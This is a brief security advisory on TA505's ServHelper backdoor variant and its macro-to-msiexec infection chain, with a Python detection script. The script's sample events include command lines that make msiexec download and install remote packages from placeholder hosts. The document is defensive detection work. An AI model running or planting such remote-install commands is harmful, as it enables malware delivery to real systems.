
New ServHelper Backdoor Variant Threatens Financial Institutions

Russian cybercriminal group TA505 has been deploying a new variant of the ServHelper backdoor against large financial institutions globally, including those in Asia. The group continues to use spear-phishing emails carrying a macro-laden Excel spreadsheet attachment to achieve initial compromise. When the macro is activated, it invokes the Windows OS process msiexec.exe to download the ServHelper backdoor. The new ServHelper variant uses Living-off-the-Land Binaries (LOLBins) to collect system information, and it uses valid Sectigo (formerly known as Comodo) digital certificates to evade detection. The group installs additional tools to maintain persistence only if the compromised host is determined to be valuable.
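A detection check for the initial-access chain described above, written here as an added example (it is not code from Ensign or from the cited report): it flags process-creation events in which an Office application spawns msiexec.exe with a remote package URL on the command line. The Sysmon-style field names and all event values are constructed sample data.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields),
# not real telemetry. The first two model the chain described above: an Excel
# macro launching msiexec.exe to fetch a remote MSI package.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://203.0.113.10/pkg/update.msi"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": "MsiExec.exe /i https://example.invalid/a.msi /quiet"},
    # Benign: an admin installing a local package from an interactive shell.
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\installers\tool.msi /qn"},
    # Benign: Excel spawning a helper process that is not msiexec.
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
]

# Office parents worth watching; the page describes Excel, the others are the
# same macro-capable family and are included as an assumption.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_office_msiexec_download(event):
    """True when an Office process spawns msiexec.exe with a remote package URL."""
    return (basename(event["ParentImage"]) in OFFICE_PARENTS
            and basename(event["Image"]) == "msiexec.exe"
            and URL_RE.search(event["CommandLine"]) is not None)


def find_suspicious(events):
    """Return the events that match the Office -> msiexec remote-install pattern."""
    return [e for e in events if is_office_msiexec_download(e)]


if __name__ == "__main__":
    for e in find_suspicious(SAMPLE_EVENTS):
        print("ALERT office->msiexec remote install:", e["CommandLine"])
```

The discriminating pair is the Office parent together with a remote URL; msiexec.exe fetching a package from an admin shell or a software-deployment agent is routine and is deliberately not flagged.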


Ensign InfoSecurity Singapore